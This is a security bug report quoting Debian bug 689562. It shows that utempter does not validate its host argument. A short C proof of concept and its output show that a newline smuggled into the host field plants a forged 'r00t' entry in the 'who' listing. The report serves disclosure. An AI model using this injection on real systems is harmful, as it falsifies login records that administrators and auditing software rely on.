Quoting from 
http://bugs.debian.org/689562

  Utempter does not (cannot?) verify the setting of host, so it can easily
  be faked. This may affect any software that depend on utmp correctness.
  
  Demo of the issue:
  
  psz@bari:~$ cat silly.c
  #include <sys/types.h>
  #include <sys/stat.h>
  #include <fcntl.h>
  #include <unistd.h>
  #include <stdio.h>
  int main()
  {
    int i;
    i = open("/dev/ptmx", O_RDWR);
    printf("open ptmx returned %d\n", i);
    dup2(i, 0);
    /* dup2(i, 1); */
    printf("doing utempter add\n");
    system("/usr/lib/utempter/utempter add 'xyz)\nr00t     pts/0        Jan  1 01:02 (xyz.com'");
    printf("checking who\n");
    system("who | grep xyz");
    printf("doing utempter del\n");
    system("/usr/lib/utempter/utempter del");
    printf("checking who\n");
    system("who | grep xyz");
    printf("DONE\n");
  }
  psz@bari:~$ cc silly.c; a.out
  open ptmx returned 3
  doing utempter add
  checking who
  psz      pts/29       Oct  4 11:48 (xyz)
  r00t     pts/0        Jan  1 01:02 (xyz.com)
  doing utempter del
  checking who
  DONE
  psz@bari:~$ 
  
  Please see also:
  http://bugs.debian.org/329156
  http://bugs.debian.org/330907

Cheers, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia